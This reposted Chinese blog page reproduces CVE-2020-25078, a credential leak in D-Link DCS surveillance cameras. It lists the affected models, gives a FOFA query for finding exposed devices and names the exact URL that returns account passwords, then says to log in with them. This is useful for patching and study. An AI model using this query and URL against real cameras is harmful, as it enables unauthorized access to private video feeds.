D-Link DCS系列監控賬號密碼信息泄露漏洞 CVE-2020-25078 - 碼上快樂

相關內容簡體繁體

D-Link DCS系列監控賬號密碼信息泄露漏洞 CVE-2020-25078

本文轉載自查看原文 2021-04-28 16:32 548 D-Link

漏洞描述

D-Link DCS系列監控通過訪問特定的URL得到賬號密碼信息，攻擊者通過漏洞進入后台可以獲取視頻監控頁面

漏洞影響

Note

DCS-2530L DCS-2670L DCS-4603 DCS-4622 DCS-4701E DCS-4703E DCS-4705E DCS-4802E DCS-P703

FOFA

Note

app="D_Link-DCS-2530L"

訪問登錄界面

出現漏洞的 Url 為, 其中泄露了賬號密碼

1 http://xxx.xxx.xxx.xxx/config/getuser?index=0

使用泄露的賬號密碼登陸系統

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 D-Link DCS-2530L和DCS-2670L監控信息泄露漏洞（CVE-2020-25078）復現 Kyan 網絡監控設備賬號密碼泄露漏洞 D-Link系列路由器漏洞挖掘入門 IOT入門---------第一個cve復現(CVE-2020-24581 D-Link DSL-2888A 遠程命令執行漏洞分析) Linux和windows下清除svn保存的賬號密碼信息【邏輯漏洞】任意賬號密碼重置銳捷RG-UAC統一上網行為管理審計系統賬號密碼泄露漏洞 CNVD-2021-14536 es 賬號密碼服務器和mysql賬號密碼過期時間監控 802.1X 賬號密碼+設備信息雙重認證

粵ICP備18138465號 © 2018-2025 CODEPRJ.COM